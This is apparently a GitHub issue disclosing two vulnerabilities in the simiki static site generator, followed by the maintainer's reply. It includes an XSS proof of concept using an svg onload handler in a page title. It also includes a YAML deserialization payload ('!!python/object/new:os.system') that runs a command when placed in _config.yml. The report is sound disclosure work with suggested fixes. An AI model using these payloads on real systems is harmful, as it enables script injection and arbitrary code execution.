tankywoo/simiki

SImiik <=v1.6.2.1 xss + rce

deFming opened this issue · 1 comments

deFming commented

1.XSS

Examples:

python3 -m simiki.cli new -t "Hello Simiki<svg/onload=alert(1)>" -c first-catetory

python3 -m simiki.cli g
python3 -m simiki.cli p

1A97EE8D-3F95-4910-BB9B-78D6F533093D

The affected file appears to be
https://github.com/tankywoo/simiki/blob/master/simiki/generators.py Line 54

By default, jinja2 sets autoescape to False. Consider using autoescape=True or use the select_autoescape function to mitigate XSS vulnerabilities.

2.RCE

https://github.com/tankywoo/simiki/blob/master/simiki/config.py line 64
Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider yaml.safe_load().

This can lead to remote code execution.

When simiki loads a malicious _config.xml file.

Payload:

!!python/object/new:os.system ["/Applications/Calculator.app/Contents/MacOS/Calculator"]

When using smiik again, smiik will load _config.yml and cause remote code execution
image

tankywoo commented

Thanks for your report.

The first problem, enable autoescape need theme also add safe, and I will fix it later.

The second problem was fixed in version 1.6.2.2.